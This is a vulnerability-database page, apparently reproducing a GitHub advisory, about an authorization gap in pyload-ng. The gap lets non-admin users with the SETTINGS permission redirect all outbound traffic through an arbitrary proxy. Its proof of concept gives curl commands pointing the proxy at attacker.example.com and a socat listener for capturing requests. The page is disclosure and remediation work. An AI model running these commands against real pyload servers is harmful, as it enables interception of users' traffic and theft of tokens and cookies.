Severity by source
AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:L
Primary rating from GitHub Advisory · only source for this CVE.
CVSS VectorGitHub Advisory
CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:L
Lifecycle Timeline
2DescriptionGitHub Advisory
Summary
The set_config_value() API method (@permission(Perms.SETTINGS)) in src/pyload/core/api/__init__.py gates security-sensitive options behind a hand-maintained allowlist ADMIN_ONLY_CORE_OPTIONS. The allowlist contains ("proxy", "username") and ("proxy", "password") - which protect the proxy credentials - but it does not include ("proxy", "enabled"), ("proxy", "host"), ("proxy", "port"), or ("proxy", "type"). Any authenticated user with the non-admin SETTINGS permission can enable proxying and point pyload at any host they control. From that point, every outbound download, captcha fetch, update check, and plugin HTTP call is transparently routed through the attacker.
Gating only the proxy credentials is ineffective: the attacker is the proxy endpoint, so they do not need pyload's proxy-auth secret. proxy.username / proxy.password were designed so an admin could authenticate to a trusted corporate proxy; they do not help when the non-admin attacker is free to choose the proxy itself.
This is a direct continuation of the fix family CVE-2026-33509 / CVE-2026-35463 / CVE-2026-35464 / CVE-2026-35586, each of which patched a different missed option in the same allowlist. CVE-2026-35586 in particular bundled three related SSL-cert options into one advisory on the same rationale applied here - the four proxy.* fields are jointly required to weaponize the miss and are patched together.
Details
Writer - src/pyload/core/api/__init__.py, set_config_value() (around lines 215-290). The allowlist:
ADMIN_ONLY_CORE_OPTIONS = {
("general", "storage_folder"),
("log", "syslog_host"), ("log", "syslog_port"),
("proxy", "password"), ("proxy", "username"),
# <-- credentials gated
("reconnect", "script"),
("webui", "host"),
("webui", "ssl_certfile"), ("webui", "ssl_keyfile"), ("webui", "ssl_certchain"),
("webui", "use_ssl"),
}("proxy", "enabled"), ("proxy", "host"), ("proxy", "port"), ("proxy", "type") are absent.
Reader - src/pyload/core/network/request_factory.py:82-100:
def get_proxies(self):
if not self.pyload.config.get("proxy", "enabled"):
return {}
proxy_type = self.pyload.config.get("proxy", "type")
proxy_host = self.pyload.config.get("proxy", "host")
proxy_port = self.pyload.config.get("proxy", "port")
proxy_username = self.pyload.config.get("proxy", "username") or None
proxy_password = self.pyload.config.get("proxy", "password") or None
return {"type": proxy_type, ..., "host": proxy_host, "port": proxy_port, ...}Sink - src/pyload/core/network/http/http_request.py (around lines 211-230) passes the dict to pycurl via PROXY / PROXYPORT / PROXYTYPE options. get_proxies() is called every time a new pycurl handle is constructed, so the new proxy config takes effect on the next outbound request - no restart required.
PoC
Authenticated as any user with Perms.SETTINGS (non-admin role):
# 1) Log in as the SETTINGS (non-admin) user.
curl -c cookies.txt -X POST http://pyload.example:8000/api/login \
-d 'username=settings_user&password=<password>'
# 2) Redirect all outbound traffic through attacker.example.com:8080.
for kv in \
'category=proxy&option=enabled&value=True' \
'category=proxy&option=host&value=attacker.example.com' \
'category=proxy&option=port&value=8080' \
'category=proxy&option=type&value=http' ; do
curl -b cookies.txt -X POST http://pyload.example:8000/api/setConfigValue \
-d "$kv§ion=core"
done
# 3) Enqueue any download (or wait for any periodic update / captcha
# fetch). The attacker's server receives the full request - URL,
# query string (often carrying auth tokens on download sites),
# headers, cookies - and can inject an arbitrary response body.Verification: run a raw HTTP listener on attacker.example.com:8080 (e.g. socat -v TCP-LISTEN:8080,fork,reuseaddr -), trigger any pyload download, and observe the full request on the listener.
Impact
- Who: any authenticated user whose role was granted
Perms.SETTINGS. Multi-user pyload deployments that delegate settings administration to non-admins are the primary blast radius. - What:
- Full interception of all outbound HTTP traffic: URLs (including embedded tokens), headers, cookies (download-site session IDs), request bodies, and response bodies flow through the attacker.
- Credential theft from any download-site auth cookies or bearer tokens that affected plugins send.
- Arbitrary response injection - poisoned archive files into the extractor pipeline; poisoned HTML into anticaptcha solvers; arbitrary content into the update checker.
- Chains with the sibling
ssl_verifyadvisory: if the attacker additionally setsgeneral.ssl_verify=off(same authz family), the MitM works for HTTPS too, with forged certs accepted for any hostname. Both settings together let the attacker fully weaponize whatset_config_valuealready permits to a SETTINGS user.
- Why gating the credentials alone is insufficient: already covered in the summary - the attacker owns the proxy endpoint, so they do not need pyload's proxy-auth creds.
AnalysisAI
Authenticated users with non-admin SETTINGS permission in pyload-ng ≤0.5.0b3.dev99 can redirect all outbound HTTP traffic through attacker-controlled proxies by modifying ungated proxy configuration fields (enabled, host, port, type). The vulnerability is an incomplete fix in a series of authorization bypass issues (CVE-2026-33509/-35463/-35464/-35586) where a hand-maintained allowlist in set_config_value() gates only proxy credentials (username/password) but not the proxy destination itself, allowing credential theft, traffic interception, and response injection across downloads, captcha solvers, and update checks. No public exploit identified at time of analysis, though the GitHub advisory includes a working proof-of-concept demonstrating traffic redirection via API calls. Patch confirmed in version 0.5.0b3.dev100 per vendor advisory GHSA-pg67-9wjv-mr85.
Technical ContextAI
pyload-ng is a Python-based download manager (pip package) with role-based API authorization. The set_config_value() method applies a permission decorator @permission(Perms.SETTINGS) and validates security-sensitive options against ADMIN_ONLY_CORE_OPTIONS allowlist (CWE-441: Unintended Proxy or Intermediary). The allowlist covers proxy.username and proxy.password to prevent credential disclosure to SETTINGS-role users, but omits the four operational proxy settings (enabled, host, port, type). The get_proxies() method in request_factory.py reads all six proxy config keys and passes them to pycurl (PROXY, PROXYPORT, PROXYTYPE options) on every HTTP handle construction, making proxy redirection take effect immediately without restart. This incomplete gating reflects the same allowlist maintenance failure addressed in four prior CVEs in this family, where related network configuration options were progressively added to ADMIN_ONLY_CORE_OPTIONS.
RemediationAI
Upgrade to pyload-ng version 0.5.0b3.dev100 or later, which adds the four proxy operational settings (enabled, host, port, type) to ADMIN_ONLY_CORE_OPTIONS allowlist per vendor patch at https://github.com/pyload/pyload/security/advisories/GHSA-pg67-9wjv-mr85. If immediate upgrade is not feasible, revoke Perms.SETTINGS from all non-admin user roles and restrict configuration changes to full administrators only-this removes the privilege escalation vector but eliminates delegated settings management capability. Network-level compensating control: enforce egress filtering to block outbound connections on non-standard proxy ports (block all except required destination IPs for known download sources) and monitor proxy configuration file changes via file integrity monitoring, though this approach incurs operational overhead and does not address API-layer authorization. Review all user role assignments to ensure SETTINGS permission aligns with full trust boundaries; pyload-ng's permission model assumes SETTINGS users are semi-trusted operators, but this vulnerability series demonstrates that assumption is unsafe in the current allowlist implementation.
Wazuh SIEM platform versions 4.4.0 through 4.9.0 contain an unsafe deserialization vulnerability in the DistributedAPI t
BentoML version 1.4.2 and earlier contains an unauthenticated remote code execution vulnerability through insecure deser
pgAdmin 4 contains critical remote code execution vulnerabilities in the Query Tool download and Cloud Deployment endpoi
The renderLocalView function in render/views.py in graphite-web in Graphite 0.9.5 through 0.9.10 uses the pickle Python
BentoML is a Python library for building online serving systems optimized for AI apps and model inference. Rated critica
OpenSSL before 0.9.8za, 1.0.0 before 1.0.0m, and 1.0.1 before 1.0.1h does not properly restrict processing of ChangeCiph
pyLoad download manager version prior to 0.5.0b3.dev77 exposes the Flask SECRET_KEY through an unauthenticated endpoint.
In Mercurial before 4.1.3, "hg serve --stdio" allows remote authenticated users to launch the Python debugger, and conse
Unauthenticated remote code execution in Marimo ≤0.20.4 allows attackers to execute arbitrary system commands via the `/
pyLoad is the free and open-source Download Manager written in pure Python. Rated medium severity (CVSS 5.3), this vulne
Langflow (a visual LLM pipeline builder) contains a critical unauthenticated code execution vulnerability (CVE-2026-3301
Cross-user flow execution in Langflow (< 1.9.1) lets any authenticated API-key holder run another user's flow by passing
Same technique Information Disclosure
View allShare
External POC / Exploit Code
Leaving vuln.today
EUVD-2026-29121
GHSA-pg67-9wjv-mr85